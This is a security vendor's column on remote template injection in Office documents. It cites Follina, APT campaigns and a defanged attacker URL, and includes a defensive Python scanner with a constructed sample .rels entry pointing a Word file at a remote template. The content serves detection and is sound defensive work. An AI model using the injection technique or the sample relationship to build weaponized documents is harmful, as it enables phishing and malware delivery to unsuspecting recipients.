Weaponized files – files that have been altered with the intent of infecting a device – are one of the leading pieces of ammunition in the arsenals of digital adversaries.
They are used in a variety of ways. Security professionals previously found threat actors leveraging App Engine on the Google Cloud Platform (GCP) to deliver malware via PDF decoys, while further research unveiled the use of image files such as PNG and JPEG to compromise Android devices.
Albeit striking examples, these are ultimately two drops in a much larger ocean. From PDFs to image files to Microsoft Office documents, threat actors are using a variety of files containing code, links and even videos to deploy malware, ransomware, Trojans and remote access software to achieve their objectives. To make matters worse, it is becoming increasingly difficult to determine what is a threat and what is not.
Attackers are becoming increasingly intelligent in how and where they route their attacks, be it via web downloads, shared drives, or even files attached to intercepted or legitimate-looking text message feeds and email threads.
In this latest column, we’ll be looking at template injection techniques that leverage weaponized decoy documents specifically, not least because the Menlo Labs Team has recently witnessed a spike in such attacks.
What are Template Injection Techniques?
Template injection techniques are nothing new. What is new is the use of template injection in Highly Evasive Adaptable Threat (HEAT) attacks.
In 2007, Microsoft introduced new file formats for Word, Excel and PowerPoint based on the Office Open XML File Format specification, providing the ability to embed resources within a document.
Unfortunately, this change also introduced a mechanism called Relationships, used to form a connection between a source resource and a target resource in an XML file. By injecting into that XML a URL that hosts a malicious template, adversaries have been able to pursue living-off-the-land (LotL) attacks.
What makes template injection a particularly attractive technique to attackers is that no suspicious indicators like macros need to be present in the document until the malicious template is fetched.
This means that weaponized template injection documents can look benign at face value, lacking any trace of malicious URLs or exploit markers. As a result, they are highly likely to go undetected by many security detection technologies, making them perfect for deployment via email attachments.
Why is this a problem? At many firms that use email scanning technologies as a first line of defense, employees may be under the impression that only safe emails can reach their inboxes. With weaponized template injection documents slipping through the net, they may be lulled into a false sense of security.
At Menlo Security, we’ve even seen adversaries successfully hijacking existing email thread conversations to convince victims of the legitimacy of attached weaponized template injection documents.
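The evasion described above works because the document body carries no URL at all; the remote template lives in a .rels part inside the OOXML zip. The following scanner, added here as an illustration rather than code from Menlo Labs, walks every .rels part of a package and reports external relationships that Office resolves on open, skipping ordinary hyperlinks. The sample package and its host name are constructed placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REMOTE_PREFIXES = ("http://", "https://", "file://", "\\\\")  # URL schemes or UNC path


def find_remote_relationships(package_bytes):
    """Scan every .rels part of an OOXML package (docx, dotm, xlsx, pptx) and report
    external relationships that Office resolves when the file is opened. Hyperlinks
    are skipped: they are common in benign files and only followed on click."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel.get("TargetMode") != "External" or rel_type == "hyperlink":
                    continue
                if target.lower().startswith(REMOTE_PREFIXES):
                    findings.append({
                        "part": part,
                        "type": rel_type,  # attachedTemplate, oleObject, image, ...
                        "target": target,
                        "marker": target.endswith("!"),  # trailing "!" as in the Follina documents
                    })
    return findings


def build_sample_docx():
    """Constructed sample, not a real-world file: settings.xml.rels points to a
    remote .dotm on a placeholder host; document.xml.rels holds a benign hyperlink."""
    settings_rels = (
        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
        f'Type="{OFFICE_REL}attachedTemplate" TargetMode="External" '
        'Target="https://template-host.example/en-us/styles.dotm!"/></Relationships>')
    document_rels = (
        f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId2" '
        f'Type="{OFFICE_REL}hyperlink" TargetMode="External" '
        'Target="https://www.example.com/"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()
```

Run `find_remote_relationships(open("suspect.docx", "rb").read())` on a real attachment; any attachedTemplate or oleObject hit pointing off-host is worth quarantining before a user opens it.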
Template Injection Attacks in Action
The Menlo Labs team has witnessed various template injection attacks of late, a prime example being the use of masqueraded Microsoft URLs to trick victims into downloading a malicious template.
In these instances, we’ve seen documents download a malicious .dotm template from a specialized URL; the template then downloads malware onto the victim’s endpoint, using image steganography to hide the payload in an image taken by the James Webb Telescope.
The “Follina” zero-day vulnerability (CVE-2022-30190) is a second example. Follina is a vulnerability in the Microsoft Support Diagnostic Tool (MSDT); threat actors hosted the exploit at an external, public-facing URL and injected that URL into a document, with an exploit marker “!” at the end of the URL to trigger the template. In one of the attacks we witnessed, the document claimed to be a “VIP Invitation to Doha Expo 2023.”
Thirdly, the Menlo Labs team also saw the infamous advanced persistent threat (APT) group Patchwork leveraging template injection attacks. Potential victims downloaded a weaponized document from the URL “http://office-fonts[.]herokuapp[.]com/en-us,” which claimed to be from the “Ministry of Defense, Pakistan”; any victim opening it would be faced with the download of a password-protected PDF file, “Scan03.pdf.”
Notably, the URL used in the attack was hosted on a cloud platform, “Heroku.” Using benign or reputable domains to deliver malware in this way is a known HEAT technique called Legacy URL Reputation Evasion (LURE) or Living Off Trusted Sites (LOTS).
Mitigating Advanced Threats
In recent months, we’ve seen plenty of additional examples of targeted attacks using weaponized template injection documents.
In August 2022, Morphisec posted details about the DoNot team’s latest spear phishing email campaign, which used RTF template injection documents to attack targeted government departments such as Pakistan’s defense sector.
Further, PwC and Proofpoint posted details on attacks carried out by the TA453 group in July 2022 and again in September 2022; these efforts leveraged Microsoft Word document droppers that use remote template injection to obtain and execute a malicious macro.
Meanwhile, in a recent post from September 2022, Cisco posted details on Gamaredon APT targeting Ukrainian government agencies with phishing emails to deliver Microsoft Office documents containing remote templates with malicious macros.
Based on the nature of these attacks, we assess with high confidence that template injection attacks will continue to increase and even be used to load exploits on the fly.
To mitigate the threat of template injection attacks, we recommend organizations consider adopting isolation technology. It ensures that all documents are opened in a cloud container away from the user’s endpoint, converting any file into a safe, viewable version from which any active or malicious content has been stripped out and removed.
In facing advanced threats such as template injection attacks, legacy tools no longer offer adequate protection. Organizations need modernized defenses.